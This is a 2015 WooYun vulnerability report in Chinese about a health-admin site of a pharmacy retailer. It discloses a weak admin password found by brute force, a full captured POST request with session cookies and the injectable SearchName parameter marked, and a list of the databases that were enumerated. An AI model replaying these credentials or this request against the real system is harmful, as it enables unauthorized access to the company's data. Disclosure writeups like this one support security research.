金象网某重要站点存在SQL注射漏洞 | wooyun-2015-0146659| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146659

漏洞标题：金象网某重要站点存在SQL注射漏洞

漏洞作者：沦沦

提交时间：2015-10-15 09:41

修复时间：2015-11-29 09:42

公开时间：2015-11-29 09:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

问题URL：http://healthadmin.jxdyf.com/
首先后台可进行暴破，使用TOP500成功暴出一个账号

账号：yangjie 密码：123456
进入后台之后疾病管理的名称没进行SQL注入过滤

POST /Disease/DiseaseList.aspx HTTP/1.1
Host: healthadmin.jxdyf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://healthadmin.jxdyf.com/Disease/DiseaseList.aspx
Cookie: JA-U=201510311485256329109920923; Hm_lvt_3c25f2d00e85563a4397eae062de881e=1444794535; Hm_lpvt_3c25f2d00e85563a4397eae062de881e=1444797177; forget_mobile=MTMwNjA5ODA2NTI; find_password_temporary_token=YjkxNTVlYjktODEwYS00ODRlLTkxY2QtNzk3ZmI1OTQzZmFm; reset_username=MTMwNjA5ODA2NTI; juc="cs=YnQ9MTQ0NDc3MTg4MDAxNiZldD0xNDQ0ODU4MjgwMDE2JnVpZD0yMDE4MjkyJnVuPXBlcjFzaCZjdj0xJmx0PS0x"; jue="es=MzM5NWJjNGUxZTMxYzcwOGM3ZmE0ZGI5Y2Y1OTI0YjM"; user_info=eyJ1aWQiOjIwMTgyOTIsIm5pY2tOYW1lIjoiang1MzgzMThxZ28iLCJhdmF0YXIiOiJodHRwOi8vaW1nNS5qeGR5Zi5jb20vdXNlci84MjYzLzYyZS84OTQ5LzZhNGI1N2FkNV9MLmpwZyIsInJhbmsiOjAsInNjb3JlIjo1MCwic2NvcmVWYWx1ZXMiOjAuMjUsInJlbWFpbmluZyI6MC4wMCwic2FmZUxldmVsIjoxLCJpbnZpdGF0aW9uQ29kZSI6IjM2MzI1MjE4NjQiLCJ1c2VyTmFtZSI6InBlcjFzaCIsIm1vYmlsZSI6IjEzMDYwOTgwNjUyIiwidmlzaXRVaWQiOjB9; token=ejNqRVMyeTRBa0x2RDRsMzhpTmtjSDRfOUhBdEUyMjNmZWVuNHZtVUZFdl9LUzA1VnZ0eDQwQ1EwNFNQQUxBZXRMVlJJR2ZfY3VMS1dEN0Eyc0JMdVVIN2wtb2cycjd5TVNTZHVUU2FrVkVUR2NuaWoxMWtWQQ; UID=2018292; ASP.NET_SessionId=15tux2dhcw5kedgvyqqcai3a; HVCODE=f7dc6680cc276b4e2b4efec52142f93f; JXHEP=ps=YnQ9NDk4MTQxMDM0MzQxNjI2NyZkYz1eYXNkZmpVUFExNjVhc2Rhd14qMTIzIyVhc2RrJmRwdD28vMr1sr8mZWlkPTE1JmVuPXlhbmdqaWUmZXQ9NDk4MjI3NDM0MzQxNjI2NyZuaWNrPdHuvdwmcG9zPSZyb2xlcz0z; JXHEE=es=MWJlZWFjNjU2MGM3ZDhmM2QyN2RmY2ZjY2U0YjdmNTA=; td_cookie=362888848; .ASPXAUTH=98CAF730B2C26AB5A8CDF7710BC69413CCF9B2594954098C4FE4560064E4688C4809C376CB47B6ADE959CA7547123D60CEC68C66A5B63C129A6EA52F4993773C97105D95EF0F84FBB89A07457450524A5D6B5E24EF89282BA8016F5468273F45C675636F9D1889A47255E21767A3F0D622D3A3F19682E57528908D2019EE1E0850115C212B602788ACCBEC7C276A9407
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3651
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTUxOTQ5MzAyOQ9kFgJmD2QWBgIDDxYCHgRUZXh0BRDmioDmnK%2Fpg6gg5p2o5p2wZAIFDxYCHgtfIUl0ZW1Db3VudAIEFghmD2QWBGYPFQIM55a%2B55eF566h55CGDOeWvueXheeuoeeQhmQCAQ8WAh8BAgUWCgIBD2QWAmYPFQMZL0Rpc2Vhc2UvRGlzZWFzZUxpc3QuYXNweAznlr7nl4XnrqHnkIYM55a%2B55eF566h55CGZAICD2QWAmYPFQMfL0Rpc2Vhc2UvU2VjdGlvbk9mZmljZUxpc3QuYXNweAznp5HlrqTnrqHnkIYM56eR5a6k566h55CGZAIDD2QWAmYPFQMeL0Rpc2Vhc2UvU3BlY2lhbEdyb3VwTGlzdC5hc3B4EueJueauiuS6uue%2BpOeuoeeQhhLnibnmrorkurrnvqTnrqHnkIZkAgQPZBYCZg8VAxsvRGlzZWFzZS9Cb2R5UGxhY2VMaXN0LmFzcHgS5Lq65L2T6YOo5L2N566h55CGEuS6uuS9k%2BmDqOS9jeeuoeeQhmQCBQ9kFgJmDxUDIi9EaXNlYXNlL1BoeXNpb2xvZ2ljYWxBZ2VMaXN0LmFzcHgS55Sf55CG5bm06b6E566h55CGEueUn%2BeQhuW5tOm%2BhOeuoeeQhmQCAQ9kFgRmDxUCDOaWh%2BeroOeuoeeQhgzmlofnq6DnrqHnkIZkAgEPFgIfAQIDFgYCAQ9kFgJmDxUDEi9BcnRpY2xlL0xpc3QuYXNweAzmlofnq6DnrqHnkIYM5paH56ug566h55CGZAICD2QWAmYPFQMcL0FydGljbGUvRXZhbHVhdGlvbkxpc3QuYXNweAzor4Tku7fnrqHnkIYM6K%2BE5Lu3566h55CGZAIDD2QWAmYPFQMdL0FydGljbGUvQXJ0aWNsZVR5cGVMaXN0LmFzcHgM5paH56ug5YiG57G7DOaWh%2BeroOWIhuexu2QCAg9kFgRmDxUCDOeXh%2BeKtueuoeeQhgznl4fnirbnrqHnkIZkAgEPFgIfAQIBFgICAQ9kFgJmDxUDGi9TeW1wdG9tcy9TeW1wdG9tTGlzdC5hc3B4DOeXh%2BeKtueuoeeQhgznl4fnirbnrqHnkIZkAgMPZBYEZg8VAglDTVPnrqHnkIYJQ01T566h55CGZAIBDxYCHwECChYUAgEPZBYCZg8VAxYvQ01TL0NvbW1vbkhlYWRlci5hc3B4DOWFrOeUqOWktOmDqAzlhaznlKjlpLTpg6hkAgIPZBYCZg8VAxYvQ01TL0NvbW1vbkJvdHRvbS5hc3B4DOWFrOeUqOWwvumDqAzlhaznlKjlsL7pg6hkAgMPZBYCZg8VAxAvQ01TL1Nob3VZZS5hc3B4DOmmlumhteWPkeW4gwzpppbpobXlj5HluINkAgQPZBYCZg8VAxEvQ01TL0Rpc2Vhc2UuYXNweA%2Fnlr7nl4XpobXlj5HluIMP55a%2B55eF6aG15Y%2BR5biDZAIFD2QWAmYPFQMSL0NNUy9TeW1wdG9tcy5hc3B4D%2BeXh%2BeKtumhteWPkeW4gw%2Fnl4fnirbpobXlj5HluINkAgYPZBYCZg8VAxEvQ01TL0FydGljbGUuYXNweA%2Fmlofnq6DpobXlj5HluIMP5paH56ug6aG15Y%2BR5biDZAIHD2QWAmYPFQMaL0NNUy9TcGVjaWFsL1R5cGVMaXN0LmFzcHgM5LiT6aKY5YiG57G7DOS4k%2BmimOWIhuexu2QCCA9kFgJmDxUDFi9DTVMvU3BlY2lhbC9MaXN0LmFzcHgM5LiT6aKY5Y%2BR5biDDOS4k%2BmimOWPkeW4g2QCCQ9kFgJmDxUDEy9DTVMvRmlsZUFkbWluLmFzcHgM5paH5Lu2566h55CGDOaWh%2BS7tueuoeeQhmQCCg9kFgJmDxUDFC9DTVMvSW5mb1Nob3VZZS5hc3B4GOi1hOiur%2BaWh%2BeroOmmlumhteWPkeW4gxjotYTorq%2Fmlofnq6DpppbpobXlj5HluINkAgcPZBYCAgEPZBYIAgMPZBYCZg9kFgICAQ8QDxYGHg5EYXRhVmFsdWVGaWVsZAUIb2ZmaWNlSUQeDURhdGFUZXh0RmllbGQFCk9mZmljZU5hbWUeC18hRGF0YUJvdW5kZ2QQFRgJ6K%2B36YCJ5oupBuWGheenkQblpJbnp5EJ5aaH5Lqn56eRCeiCv%2BeYpOenkQblhL%2Fnp5EJ5LqU5a6Y56eRBueUt%2BenkQnkvKDmn5Pnp5EM55qu6IKk5oCn55eFBuiCneeXhQ%2Fnsr7npZ7lv4PnkIbnp5ES5Lit6KW%2F5Yy757uT5ZCI56eREuS9k%2BajgOOAgeS%2FneWBpeenkQznlJ%2FmrpblgaXlurcJ5oCl6K%2BK56eRCeiAgeW5tOenkQzmoLjljLvlrabnp5EP5oiQ55i%2B5Yy75a2m56eRCeiQpeWFu%2BenkQzovoXliqnmo4Dmn6UJ5bq35aSN56eRCeeQhueWl%2BenkQzlhbbku5bnu7zlkIgVGAEwATEBMgE3ATgBOQIxMAIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAI2MgI2MwI2NAI2NRQrAxhnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2cWAWZkAhcPFgIfAGVkAh8PFgIfAWZkAiEPDxYEHgtSZWNvcmRjb3VudGYeCFBhZ2VTaXplAgxkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAURY3RsMDAkYyRjYm94SXNUb3AFEWN0bDAwJGMkY2JveElzTmV3BRJjdGwwMCRjJGNib3hJc1B1c2gFEmN0bDAwJGMkY2JveElzSG9tZWNpNyqGKsf9oDSAwdoQhT2lj2xaVqspO6u%2FObX0gPpl&__EVENTVALIDATION=%2FwEWKALNxt3tBQL64NjiCQLqj%2FKMBQL1j%2FKMBQL0j%2FKMBQLzj%2FKMBQLij%2FKMBQLtj%2FKMBQL1j7KPBQL1j7qPBQL1j4aPBQL1j4KPBQL1j46PBQL1j4qPBQL1j5aPBQL1j9KMBQL1j96MBQL0j7KPBQL0j76PBQL0j7qPBQL0j4aPBQL0j4KPBQLwj7qPBQLwj4aPBQLwj4KPBQLwj46PBQL64MziCQLqj%2BaMBQLd6uWPDAKO2tOvCQLtqstHApbopDwCg4q2iAYCwLmFwAUCmuWm9g8ChMKWsgEClLGZpQ0CtJPrxgwCyIuZ%2BQcCnKbk7QK4q%2FTV%2BiDKk82dXrjFanVYwEnYfPAmSuMMj6VBsK%2Fy1w%3D%3D&ctl00%24c%24ddlOffice1=0&ctl00%24c%24ddlOffice2=0&ctl00%24c%24SearchID=&ctl00%24c%24SearchName=*&ctl00%24c%24SearchTitle=&ctl00%24c%24SearchSort=&ctl00%24c%24butSearch=%E6%9F%A5%E8%AF%A2

SearchName参数没进行过滤

available databases [22]:
[*] [ddddd_Cdd\n\n\n\n\n\n\n]
[*] [ddddd_Sda\n\n\n\n\n\n\n]
[*] [JXSCMUddd\n]
[*] [JXUddddBa\n\n]
[*] [LS_TdddWd\n\n\n\n\n\n\n\n\n\n]
[*] [TddddPadd\n]
[*] dadddd
[*] dddb
[*] ddddd
[*] dddddb
[*] ddddddd
[*] JXChat
[*] JXChat2
[*] JXCouponBadd
[*] JXECCMS
[*] JXECHealtd
[*] JXECPhone
[*] JXECUnion
[*] JXOrdersBadd
[*] JXSCM
[*] JXSCM20130530
[*] JXYX

漏洞证明：

问题URL：http://healthadmin.jxdyf.com/
首先后台可进行暴破，使用TOP500成功暴出一个账号

账号：yangjie 密码：123456
进入后台之后疾病管理的名称没进行SQL注入过滤

POST /Disease/DiseaseList.aspx HTTP/1.1
Host: healthadmin.jxdyf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://healthadmin.jxdyf.com/Disease/DiseaseList.aspx
Cookie: JA-U=201510311485256329109920923; Hm_lvt_3c25f2d00e85563a4397eae062de881e=1444794535; Hm_lpvt_3c25f2d00e85563a4397eae062de881e=1444797177; forget_mobile=MTMwNjA5ODA2NTI; find_password_temporary_token=YjkxNTVlYjktODEwYS00ODRlLTkxY2QtNzk3ZmI1OTQzZmFm; reset_username=MTMwNjA5ODA2NTI; juc="cs=YnQ9MTQ0NDc3MTg4MDAxNiZldD0xNDQ0ODU4MjgwMDE2JnVpZD0yMDE4MjkyJnVuPXBlcjFzaCZjdj0xJmx0PS0x"; jue="es=MzM5NWJjNGUxZTMxYzcwOGM3ZmE0ZGI5Y2Y1OTI0YjM"; user_info=eyJ1aWQiOjIwMTgyOTIsIm5pY2tOYW1lIjoiang1MzgzMThxZ28iLCJhdmF0YXIiOiJodHRwOi8vaW1nNS5qeGR5Zi5jb20vdXNlci84MjYzLzYyZS84OTQ5LzZhNGI1N2FkNV9MLmpwZyIsInJhbmsiOjAsInNjb3JlIjo1MCwic2NvcmVWYWx1ZXMiOjAuMjUsInJlbWFpbmluZyI6MC4wMCwic2FmZUxldmVsIjoxLCJpbnZpdGF0aW9uQ29kZSI6IjM2MzI1MjE4NjQiLCJ1c2VyTmFtZSI6InBlcjFzaCIsIm1vYmlsZSI6IjEzMDYwOTgwNjUyIiwidmlzaXRVaWQiOjB9; token=ejNqRVMyeTRBa0x2RDRsMzhpTmtjSDRfOUhBdEUyMjNmZWVuNHZtVUZFdl9LUzA1VnZ0eDQwQ1EwNFNQQUxBZXRMVlJJR2ZfY3VMS1dEN0Eyc0JMdVVIN2wtb2cycjd5TVNTZHVUU2FrVkVUR2NuaWoxMWtWQQ; UID=2018292; ASP.NET_SessionId=15tux2dhcw5kedgvyqqcai3a; HVCODE=f7dc6680cc276b4e2b4efec52142f93f; JXHEP=ps=YnQ9NDk4MTQxMDM0MzQxNjI2NyZkYz1eYXNkZmpVUFExNjVhc2Rhd14qMTIzIyVhc2RrJmRwdD28vMr1sr8mZWlkPTE1JmVuPXlhbmdqaWUmZXQ9NDk4MjI3NDM0MzQxNjI2NyZuaWNrPdHuvdwmcG9zPSZyb2xlcz0z; JXHEE=es=MWJlZWFjNjU2MGM3ZDhmM2QyN2RmY2ZjY2U0YjdmNTA=; td_cookie=362888848; .ASPXAUTH=98CAF730B2C26AB5A8CDF7710BC69413CCF9B2594954098C4FE4560064E4688C4809C376CB47B6ADE959CA7547123D60CEC68C66A5B63C129A6EA52F4993773C97105D95EF0F84FBB89A07457450524A5D6B5E24EF89282BA8016F5468273F45C675636F9D1889A47255E21767A3F0D622D3A3F19682E57528908D2019EE1E0850115C212B602788ACCBEC7C276A9407
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3651
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTUxOTQ5MzAyOQ9kFgJmD2QWBgIDDxYCHgRUZXh0BRDmioDmnK%2Fpg6gg5p2o5p2wZAIFDxYCHgtfIUl0ZW1Db3VudAIEFghmD2QWBGYPFQIM55a%2B55eF566h55CGDOeWvueXheeuoeeQhmQCAQ8WAh8BAgUWCgIBD2QWAmYPFQMZL0Rpc2Vhc2UvRGlzZWFzZUxpc3QuYXNweAznlr7nl4XnrqHnkIYM55a%2B55eF566h55CGZAICD2QWAmYPFQMfL0Rpc2Vhc2UvU2VjdGlvbk9mZmljZUxpc3QuYXNweAznp5HlrqTnrqHnkIYM56eR5a6k566h55CGZAIDD2QWAmYPFQMeL0Rpc2Vhc2UvU3BlY2lhbEdyb3VwTGlzdC5hc3B4EueJueauiuS6uue%2BpOeuoeeQhhLnibnmrorkurrnvqTnrqHnkIZkAgQPZBYCZg8VAxsvRGlzZWFzZS9Cb2R5UGxhY2VMaXN0LmFzcHgS5Lq65L2T6YOo5L2N566h55CGEuS6uuS9k%2BmDqOS9jeeuoeeQhmQCBQ9kFgJmDxUDIi9EaXNlYXNlL1BoeXNpb2xvZ2ljYWxBZ2VMaXN0LmFzcHgS55Sf55CG5bm06b6E566h55CGEueUn%2BeQhuW5tOm%2BhOeuoeeQhmQCAQ9kFgRmDxUCDOaWh%2BeroOeuoeeQhgzmlofnq6DnrqHnkIZkAgEPFgIfAQIDFgYCAQ9kFgJmDxUDEi9BcnRpY2xlL0xpc3QuYXNweAzmlofnq6DnrqHnkIYM5paH56ug566h55CGZAICD2QWAmYPFQMcL0FydGljbGUvRXZhbHVhdGlvbkxpc3QuYXNweAzor4Tku7fnrqHnkIYM6K%2BE5Lu3566h55CGZAIDD2QWAmYPFQMdL0FydGljbGUvQXJ0aWNsZVR5cGVMaXN0LmFzcHgM5paH56ug5YiG57G7DOaWh%2BeroOWIhuexu2QCAg9kFgRmDxUCDOeXh%2BeKtueuoeeQhgznl4fnirbnrqHnkIZkAgEPFgIfAQIBFgICAQ9kFgJmDxUDGi9TeW1wdG9tcy9TeW1wdG9tTGlzdC5hc3B4DOeXh%2BeKtueuoeeQhgznl4fnirbnrqHnkIZkAgMPZBYEZg8VAglDTVPnrqHnkIYJQ01T566h55CGZAIBDxYCHwECChYUAgEPZBYCZg8VAxYvQ01TL0NvbW1vbkhlYWRlci5hc3B4DOWFrOeUqOWktOmDqAzlhaznlKjlpLTpg6hkAgIPZBYCZg8VAxYvQ01TL0NvbW1vbkJvdHRvbS5hc3B4DOWFrOeUqOWwvumDqAzlhaznlKjlsL7pg6hkAgMPZBYCZg8VAxAvQ01TL1Nob3VZZS5hc3B4DOmmlumhteWPkeW4gwzpppbpobXlj5HluINkAgQPZBYCZg8VAxEvQ01TL0Rpc2Vhc2UuYXNweA%2Fnlr7nl4XpobXlj5HluIMP55a%2B55eF6aG15Y%2BR5biDZAIFD2QWAmYPFQMSL0NNUy9TeW1wdG9tcy5hc3B4D%2BeXh%2BeKtumhteWPkeW4gw%2Fnl4fnirbpobXlj5HluINkAgYPZBYCZg8VAxEvQ01TL0FydGljbGUuYXNweA%2Fmlofnq6DpobXlj5HluIMP5paH56ug6aG15Y%2BR5biDZAIHD2QWAmYPFQMaL0NNUy9TcGVjaWFsL1R5cGVMaXN0LmFzcHgM5LiT6aKY5YiG57G7DOS4k%2BmimOWIhuexu2QCCA9kFgJmDxUDFi9DTVMvU3BlY2lhbC9MaXN0LmFzcHgM5LiT6aKY5Y%2BR5biDDOS4k%2BmimOWPkeW4g2QCCQ9kFgJmDxUDEy9DTVMvRmlsZUFkbWluLmFzcHgM5paH5Lu2566h55CGDOaWh%2BS7tueuoeeQhmQCCg9kFgJmDxUDFC9DTVMvSW5mb1Nob3VZZS5hc3B4GOi1hOiur%2BaWh%2BeroOmmlumhteWPkeW4gxjotYTorq%2Fmlofnq6DpppbpobXlj5HluINkAgcPZBYCAgEPZBYIAgMPZBYCZg9kFgICAQ8QDxYGHg5EYXRhVmFsdWVGaWVsZAUIb2ZmaWNlSUQeDURhdGFUZXh0RmllbGQFCk9mZmljZU5hbWUeC18hRGF0YUJvdW5kZ2QQFRgJ6K%2B36YCJ5oupBuWGheenkQblpJbnp5EJ5aaH5Lqn56eRCeiCv%2BeYpOenkQblhL%2Fnp5EJ5LqU5a6Y56eRBueUt%2BenkQnkvKDmn5Pnp5EM55qu6IKk5oCn55eFBuiCneeXhQ%2Fnsr7npZ7lv4PnkIbnp5ES5Lit6KW%2F5Yy757uT5ZCI56eREuS9k%2BajgOOAgeS%2FneWBpeenkQznlJ%2FmrpblgaXlurcJ5oCl6K%2BK56eRCeiAgeW5tOenkQzmoLjljLvlrabnp5EP5oiQ55i%2B5Yy75a2m56eRCeiQpeWFu%2BenkQzovoXliqnmo4Dmn6UJ5bq35aSN56eRCeeQhueWl%2BenkQzlhbbku5bnu7zlkIgVGAEwATEBMgE3ATgBOQIxMAIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAI2MgI2MwI2NAI2NRQrAxhnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2cWAWZkAhcPFgIfAGVkAh8PFgIfAWZkAiEPDxYEHgtSZWNvcmRjb3VudGYeCFBhZ2VTaXplAgxkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAURY3RsMDAkYyRjYm94SXNUb3AFEWN0bDAwJGMkY2JveElzTmV3BRJjdGwwMCRjJGNib3hJc1B1c2gFEmN0bDAwJGMkY2JveElzSG9tZWNpNyqGKsf9oDSAwdoQhT2lj2xaVqspO6u%2FObX0gPpl&__EVENTVALIDATION=%2FwEWKALNxt3tBQL64NjiCQLqj%2FKMBQL1j%2FKMBQL0j%2FKMBQLzj%2FKMBQLij%2FKMBQLtj%2FKMBQL1j7KPBQL1j7qPBQL1j4aPBQL1j4KPBQL1j46PBQL1j4qPBQL1j5aPBQL1j9KMBQL1j96MBQL0j7KPBQL0j76PBQL0j7qPBQL0j4aPBQL0j4KPBQLwj7qPBQLwj4aPBQLwj4KPBQLwj46PBQL64MziCQLqj%2BaMBQLd6uWPDAKO2tOvCQLtqstHApbopDwCg4q2iAYCwLmFwAUCmuWm9g8ChMKWsgEClLGZpQ0CtJPrxgwCyIuZ%2BQcCnKbk7QK4q%2FTV%2BiDKk82dXrjFanVYwEnYfPAmSuMMj6VBsK%2Fy1w%3D%3D&ctl00%24c%24ddlOffice1=0&ctl00%24c%24ddlOffice2=0&ctl00%24c%24SearchID=&ctl00%24c%24SearchName=*&ctl00%24c%24SearchTitle=&ctl00%24c%24SearchSort=&ctl00%24c%24butSearch=%E6%9F%A5%E8%AF%A2

SearchName参数没进行过滤

修复方案：

改密码过滤SQL注入

版权声明：转载请注明来源沦沦@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝